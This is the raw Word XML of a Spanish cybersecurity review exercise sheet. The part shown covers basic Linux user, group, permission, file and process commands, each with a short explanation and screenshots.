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327AE" w14:textId="1B21E8E7" w:rsidR="000944F3" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:r>
        <w:t>REPASO SEGURIDAD INFORMÁTICA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A38D8E" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562"/>
    <w:p w14:paraId="5D987BFA" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔐</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> BATERÍA DE 100 EJERCICIOS PRÁCTICOS DE CIBERSEGURIDAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD91816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t>🧱</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:t xml:space="preserve"> BLOQUE 1: LINUX BÁSICO Y PERMISOS (1–20)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7DDDE8" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="1724182A">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B6E5E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1. Crear un usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9F6400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Crea un usuario llamado alumno1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCC48F6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5B17F3F6" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo useradd alumno1</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>sudo passwd alumno1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F7021A" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>useradd crea el usuario y passwd le asigna contraseña.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B28BEFC" w14:textId="364D4960" w:rsidR="00681651" w:rsidRPr="00206562" w:rsidRDefault="00681651" w:rsidP="00206562">
      <w:r w:rsidRPr="00681651">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E04AF95" wp14:editId="24D0BA73">
            <wp:extent cx="4258269" cy="3781953"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1848983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832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8233" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5EBFC199">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A47C7C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2. Crear grupo y asignar usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC8E52E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enunciado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Crea el grupo seguridad y añade alumno1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0CEA28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567FCF34" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo groupadd seguridad</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>sudo usermod -aG seguridad alumno1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003CF375" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>-aG añade el usuario a un grupo sin eliminar otros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098A742E" w14:textId="61EE1B5C" w:rsidR="00681651" w:rsidRPr="00206562" w:rsidRDefault="00681651" w:rsidP="00206562">
      <w:r w:rsidRPr="00681651">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="069C8D64" wp14:editId="3EE8D732">
            <wp:extent cx="3219899" cy="1524213"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="348686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860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82C1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="7D72E937">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E29093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3. Ver grupos de un usuario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375483AA" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>groups alumno1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA23850" w14:textId="45F47441" w:rsidR="00681651" w:rsidRPr="00206562" w:rsidRDefault="00681651" w:rsidP="00206562">
      <w:r w:rsidRPr="00681651">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E1CC079" wp14:editId="4010BA26">
            <wp:extent cx="2314898" cy="1162212"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1746595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958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BD937" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="3C69CCA1">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D8DF4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4. Crear carpeta segura</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F9BD5E" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>mkdir /home/alumno1/privado</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>chmod 700 /home/alumno1/privado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E2A98B" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación:</w:t>
      </w:r>
      <w:r w:rsidRPr="00206562">
        <w:br/>
        <w:t>Solo el propietario puede acceder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B24FA33" w14:textId="2000FB66" w:rsidR="00CB0846" w:rsidRDefault="00CB0846" w:rsidP="00206562">
      <w:r w:rsidRPr="00CB0846">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B937BE" wp14:editId="1C4DBBAA">
            <wp:extent cx="5400040" cy="1604645"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2044328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28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8D00" w14:textId="5F241D37" w:rsidR="00CB0846" w:rsidRDefault="00CB0846" w:rsidP="00206562">
      <w:r w:rsidRPr="00CB0846">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0781A2C5" wp14:editId="7D96DB0F">
            <wp:extent cx="5400040" cy="1038860"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="1883484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843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AD207" w14:textId="77777777" w:rsidR="00CB0846" w:rsidRPr="00206562" w:rsidRDefault="00CB0846" w:rsidP="00206562"/>
    <w:p w14:paraId="1F8F3701" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="41DC1AD3">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="543DDE6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5. Cambiar propietario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648AFD39" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>sudo chown alumno1:seguridad archivo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737DD783" w14:textId="0858FA10" w:rsidR="00391104" w:rsidRPr="00391104" w:rsidRDefault="00391104" w:rsidP="00391104">
      <w:r w:rsidRPr="00391104">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00391104">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>alumno1</w:t>
      </w:r>
      <w:r w:rsidRPr="00391104">
        <w:t>: Es el nuevo usuario propietario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC1A245" w14:textId="587DE4C5" w:rsidR="00391104" w:rsidRDefault="00391104" w:rsidP="00391104">
      <w:r w:rsidRPr="00391104">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00391104">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>seguridad</w:t>
      </w:r>
      <w:r w:rsidRPr="00391104">
        <w:t>: Es el nuevo grupo propietario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAFEF7D" w14:textId="34A36DE4" w:rsidR="00391104" w:rsidRPr="00391104" w:rsidRDefault="00391104" w:rsidP="00391104">
      <w:r w:rsidRPr="00391104">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CBBA65B" wp14:editId="45E9EBCB">
            <wp:extent cx="4991797" cy="5296639"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1695184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8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53F4" w14:textId="77777777" w:rsidR="00391104" w:rsidRPr="00206562" w:rsidRDefault="00391104" w:rsidP="00206562"/>
    <w:p w14:paraId="432156B0" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="33FDDE6E">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="710775C0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6. Permisos 755</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463D4275" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>chmod 755 script.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372B5826" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Explicación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E174E3" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:t>dueño: todo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284DDC18" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:t>grupo y otros: lectura + ejecución</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1532DF77" w14:textId="337C5CD5" w:rsidR="002E07CF" w:rsidRPr="00206562" w:rsidRDefault="002E07CF" w:rsidP="002E07CF">
      <w:r w:rsidRPr="002E07CF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45021D96" wp14:editId="7D35E4E5">
            <wp:extent cx="4267796" cy="2915057"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18333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366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3DF7" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2D4AEA45">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B2FDE1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7. Permisos simbólicos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC26FB7" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>chmod u+x archivo.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B9DCA5" w14:textId="7A5765D7" w:rsidR="002E07CF" w:rsidRPr="00206562" w:rsidRDefault="00485AD7" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05EAD7EE" wp14:editId="1D6A6B74">
            <wp:extent cx="4067175" cy="3905250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="760234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342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8430" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="2E0A1768">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9014E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8. Copiar archivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247FD317" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>cp archivo.txt copia.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9796B0" w14:textId="292A4452" w:rsidR="00485AD7" w:rsidRPr="00206562" w:rsidRDefault="00485AD7" w:rsidP="00206562">
      <w:r w:rsidRPr="00485AD7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="558BCAF7" wp14:editId="671B85BC">
            <wp:extent cx="5400040" cy="3448050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1048928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9285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1F105" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="5430CF6A">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F183A9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9. Copiar carpeta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8C6A4D" w14:textId="611243D7" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>cp -r carpeta1 carpeta2</w:t>
      </w:r>
      <w:r w:rsidR="00AF54CB">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AF54CB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14C17B15" wp14:editId="45CF9215">
            <wp:extent cx="5400040" cy="1626235"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1740098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98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F5B1" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6F91FF27">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="699C92E4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10. Mover archivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BC1DF4" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>mv archivo.txt /tmp/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481AC7EF" w14:textId="3CF1FDBC" w:rsidR="008E379E" w:rsidRPr="008E379E" w:rsidRDefault="008E379E" w:rsidP="008E379E">
      <w:r w:rsidRPr="008E379E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E379E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/tmp/</w:t>
      </w:r>
      <w:r w:rsidRPr="008E379E">
        <w:t xml:space="preserve"> es una carpeta especial de Linux utilizada para almacenar </w:t>
      </w:r>
      <w:r w:rsidRPr="008E379E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>archivos temporales</w:t>
      </w:r>
      <w:r w:rsidRPr="008E379E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4675039A" w14:textId="51A665EA" w:rsidR="008E379E" w:rsidRPr="008E379E" w:rsidRDefault="008E379E" w:rsidP="008E379E">
      <w:r w:rsidRPr="008E379E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008E379E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dato de Ciberseguridad:</w:t>
      </w:r>
      <w:r w:rsidRPr="008E379E">
        <w:t xml:space="preserve"> Los atacantes suelen usar /tmp/ para descargar scripts maliciosos porque normalmente tiene permisos de escritura para todos los usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CF2088" w14:textId="2F9A2D10" w:rsidR="008E379E" w:rsidRDefault="008E379E" w:rsidP="0020656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8BF97FA" wp14:editId="79363180">
            <wp:extent cx="4972050" cy="4314825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="18339136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1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69C4" w14:textId="795374FB" w:rsidR="003C13E1" w:rsidRPr="00206562" w:rsidRDefault="003C13E1" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D5ED69" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4EF67FB7">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F01B1D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11. Eliminar archivo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F10064F" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>rm archivo.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067FE053" w14:textId="1631DD72" w:rsidR="003C13E1" w:rsidRPr="00206562" w:rsidRDefault="003C13E1" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12092D64" wp14:editId="57EDD671">
            <wp:extent cx="5400040" cy="4583430"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1516267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673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B493" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="618E75C2">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F26E3A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12. Buscar archivos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477B869B" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00206562">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>find / -name "passwd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302AA268" w14:textId="4369732F" w:rsidR="00D36D92" w:rsidRPr="00206562" w:rsidRDefault="00D36D92" w:rsidP="0020656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F74992F" wp14:editId="0E7B7722">
            <wp:extent cx="5400040" cy="5027930"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="7198594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8594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B27C" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="31486AFE">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB7388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13. Ver procesos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFF978F" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ps aux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E4A8F0" w14:textId="7B8A680F" w:rsidR="00E965EF" w:rsidRDefault="00E965EF" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07C6F72C" wp14:editId="06DCBFA6">
            <wp:extent cx="5400040" cy="2853055"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="21328846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46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0B47" w14:textId="3218EB39" w:rsidR="001840A6" w:rsidRDefault="001840A6" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0104ACB2" wp14:editId="6AE2ED65">
            <wp:extent cx="5400040" cy="5197475"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="1314336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368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CDFF" w14:textId="1EBA2F02" w:rsidR="00D36D92" w:rsidRPr="00206562" w:rsidRDefault="00D36D92" w:rsidP="00206562"/>
    <w:p w14:paraId="0E663BF8" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="423D721B">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0317459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lastRenderedPageBreak/>
        <w:t>14. Matar proceso</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED5FABD" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>kill -9 PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50537778" w14:textId="5AFE0D35" w:rsidR="001840A6" w:rsidRPr="00206562" w:rsidRDefault="001840A6" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F4D9506" wp14:editId="05E637AF">
            <wp:extent cx="5400040" cy="1547495"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1013969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697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FDAD" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="4A4F5BDC">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B10BE99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15. Ver conexiones activas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6CCAE0" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>ss -tuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D9F45D" w14:textId="3ED4D737" w:rsidR="00EF1651" w:rsidRPr="00206562" w:rsidRDefault="00EF1651" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06513E83" wp14:editId="6B3E3E45">
            <wp:extent cx="5400040" cy="1051560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1793958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9589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BE4D" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="6183EFE5">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4524826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16. Alternativa netstat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AAF7D1" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
      <w:r w:rsidRPr="00206562">
        <w:t>netstat -tuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33BBB579" w14:textId="01CC439F" w:rsidR="00EF1651" w:rsidRPr="00206562" w:rsidRDefault="00EF1651" w:rsidP="00206562">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="144AEBF4" wp14:editId="6952DA56">
            <wp:extent cx="5400040" cy="1539240"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="1343721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21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DD53" w14:textId="77777777" w:rsidR="00206562" w:rsidRPr="00206562" w:rsidRDefault="00000000" w:rsidP="00206562">
      <w:r>
        <w:pict w14:anchorId="1D971064">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C48F2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17. Ver puertos abiertos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B5528A" w14:textId="77777777" w:rsidR="00206562" w:rsidRDefault="00206562" w:rsidP="00206562">
